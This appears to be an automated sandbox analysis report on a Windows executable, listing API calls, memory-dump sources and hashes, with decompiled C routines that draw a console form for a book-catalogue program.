                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,00B2353C,?,00000008,?,?,00B121EA,00B2353C,?,00000008,?,?,00B11D68,00000000), ref: 00B1241C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: ed91e03eef8b583c3c49416cd912b1051825b8599abc86a3ae51ffcdcb8eabe4
                                                  • Instruction ID: fc12d98dbad34a73109b28b86bc69b9c2fc41f94669453034269e641b31d2a13
                                                  • Opcode Fuzzy Hash: ed91e03eef8b583c3c49416cd912b1051825b8599abc86a3ae51ffcdcb8eabe4
                                                  • Instruction Fuzzy Hash: 63B15E31610609DFD719CF28C48ABA87BE0FF45364F658698E999CF2A1C335D9E1CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B05B00,00000001,00000000,?,00AF335D,?,00B06134,00000000,?,?,?), ref: 00B05A49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 23a50070f87fecb14e32a23aaba20e67d3eca100b249b6e37e16c3b9d2713602
                                                  • Instruction ID: ac953fe496573edc9d6e4bdcb6c9b8aa98bea35de9b28b3ac47913de7e3dd2d9
                                                  • Opcode Fuzzy Hash: 23a50070f87fecb14e32a23aaba20e67d3eca100b249b6e37e16c3b9d2713602
                                                  • Instruction Fuzzy Hash: DF1106362047059FDB28AF39C8916BBBBD1FB84368B19452CE94787A80D371A942CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B05D50,00000001,00000000,?,00AF335D,?,00B060F8,00AF335D,?,?,?,?,?,00AF335D,?,?), ref: 00B05ABF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: ba6d6cf779f9f7a762b693b07e6265854ef31d770f630aacf44bcd3f9ebd2e51
                                                  • Instruction ID: cde20c7c599bf2d6a1f3f2a7701283401745e58593594df798477dcfbad85953
                                                  • Opcode Fuzzy Hash: ba6d6cf779f9f7a762b693b07e6265854ef31d770f630aacf44bcd3f9ebd2e51
                                                  • Instruction Fuzzy Hash: A4F0AF363007085FDB24AE399889ABB7FD1EB84368B19456DFA468BA90D7B15C418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AF6394: EnterCriticalSection.KERNEL32(?,?,00B06521,?,00B24560,0000000C), ref: 00AF63A3
                                                  • EnumSystemLocalesW.KERNEL32(00AF8351,00000001,00B24140,0000000C,00AF8D0E,00000000,00000000), ref: 00AF83AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 6b60913b44a0b297881049e9ed0c54aeb1f189d21de1441babeb6379512a6a4f
                                                  • Instruction ID: 630b5931c415abb21c57e3406c07597d0fd48119593748dc0228d09b398b5f84
                                                  • Opcode Fuzzy Hash: 6b60913b44a0b297881049e9ed0c54aeb1f189d21de1441babeb6379512a6a4f
                                                  • Instruction Fuzzy Hash: 31F04F32A50204AFDB20EFA8D946B5D3BE0FB04721F014256F514DF2E2CF7589459F44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • EnumSystemLocalesW.KERNEL32(00B058C5,00000001,00000000,?,?,00B06156,00AF335D,?,?,?,?,?,00AF335D,?,?,?), ref: 00B059A5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 927ea0eea7ebd03e9f54478cdaa1bd02094203d2911b2c20184501b3262decad
                                                  • Instruction ID: 53b7ba1a8eaa0600d4b4bb025d298fe079258224e41d2e754ee4a350aa1aa320
                                                  • Opcode Fuzzy Hash: 927ea0eea7ebd03e9f54478cdaa1bd02094203d2911b2c20184501b3262decad
                                                  • Instruction Fuzzy Hash: 03F0E53A70020997DB24AF36D945ABBBFD4EFC1764B474098EA09CB6D0DB719842CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(Function_00028351,00000001), ref: 00AF84EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(Function_00028351,00000001), ref: 00AF8466
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  #include <windows.h>

                                                  /* Decompiled routine at 0x004067FE: caches the process heap handle in a
                                                     global and returns a value whose low byte is 1 when GetProcessHeap
                                                     returned a non-NULL handle. */
                                                  signed int E004067FE() {
                                                  	signed int _t3;

                                                  	_t3 = (signed int)GetProcessHeap();
                                                  	*(signed int *)0x4132b0 = _t3;   /* global heap-handle slot at 0x4132b0 */
                                                  	return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                  }

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f5ab4a39da46a6765af172c9f447248e53566fe0900eb0d47425f5fa1b653a9
                                                  • Instruction ID: db288631ffcaf3116e3983e380350e8f9b0a3a99905f7a9a2c3150d17295d825
                                                  • Opcode Fuzzy Hash: 2f5ab4a39da46a6765af172c9f447248e53566fe0900eb0d47425f5fa1b653a9
                                                  • Instruction Fuzzy Hash: FEF06D31605348EFCB15DFA9DA44F59B3E8EB44345F1080A9F908C7210EB34DE80CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88625ccc06c2eb69af8b7926c71020692a6d5910490d2449a383d5b2e3dece2b
                                                  • Instruction ID: 5b9adb8fe0a1cf42f36aa2ef638cc189ef36d482015132b11431a9e0627b47e6
                                                  • Opcode Fuzzy Hash: 88625ccc06c2eb69af8b7926c71020692a6d5910490d2449a383d5b2e3dece2b
                                                  • Instruction Fuzzy Hash: FFF06D31605308EFCB15CFA8D645B59B7F8EB48395F1080A9F908C7650DA34DE41CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8b28fa06a22fff8c293cf0322283e97189e0f4748b015043632405c200f20e3
                                                  • Instruction ID: c00de00c67fe9407726666a47af4f6e3044ea2334ebce50846ce7123254dc139
                                                  • Opcode Fuzzy Hash: c8b28fa06a22fff8c293cf0322283e97189e0f4748b015043632405c200f20e3
                                                  • Instruction Fuzzy Hash: FEE0463291222CEBC728DBCC8A05AAAF3ACEB09B10B11459ABA08D3601C6709E01C7D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37ad7ea4727f9ba49799d53aaabb54e649a0d9a553b737658c65bdf83f8bec10
                                                  • Instruction ID: 60822bdc93c7afd9313f40e0892e9edd75262c9cbdede4df52c7c8e471569f31
                                                  • Opcode Fuzzy Hash: 37ad7ea4727f9ba49799d53aaabb54e649a0d9a553b737658c65bdf83f8bec10
                                                  • Instruction Fuzzy Hash: A9E08C3150120CEFC700DF94C648A49B7F8EB44310F1144A4F809C3200D634DF80DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9da65c86127557b53dffe244b71f1471860e912be3e0ebc7287fc9cd5e280ba0
                                                  • Instruction ID: b5972c289cf738cbdd4808e17bd137d3a7df00d0904f25fb66198ce135025681
                                                  • Opcode Fuzzy Hash: 9da65c86127557b53dffe244b71f1471860e912be3e0ebc7287fc9cd5e280ba0
                                                  • Instruction Fuzzy Hash: 2EC09B355615484ACF61D734D25155973D4F391781FC018C5E001C7A12C51DDC45D511
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 81%
                                                  			E00B18050(void* __ecx, void* __edx, void* __eflags) {
                                                  				char _v8;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t70;
                                                  				void* _t109;
                                                  				signed int _t113;
                                                  				void* _t117;
                                                  				void* _t118;
                                                  				void* _t122;
                                                  				void* _t159;
                                                  
                                                  				_t159 = __eflags;
                                                  				_t117 = __edx;
                                                  				_t112 = __ecx;
                                                  				0xb27e6c->X = 0x30014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, "Enter the Information Below", _t118);
                                                  				0xb27e6c->X = 0x40014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb23478, _t122);
                                                  				0xb27e6c->X = 0x50014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, _t109);
                                                  				0xb27e6c->X = 0x5002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, __ecx);
                                                  				0xb27e6c->X = 0x60014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0x6002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0x70014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0x7002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0x80014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0x8002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0x90014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0x9002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0xa0014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0xa002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0xb0014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0xb002e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, 0xb22e3c, 0xb22e3c);
                                                  				0xb27e6c->X = 0xc0014;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112);
                                                  				0xb27e6c->X = 0x50015;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t112, "Category:", 0xb23478);
                                                  				0xb27e6c->X = 0x5001f;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				_t113 =  *0xb27f30; // 0x0
                                                  				_t1 = (_t113 << 4) -  *0xb27f30 + 0xb26941; // -5615
                                                  				E00AD1080((_t113 << 4) -  *0xb27f30, "%s", _t1);
                                                  				0xb27e6c->X = 0x60015;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				_push("Book ID:\t");
                                                  				E00AD1080((_t113 << 4) -  *0xb27f30);
                                                  				0xb27e6c->X = 0x6001e;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
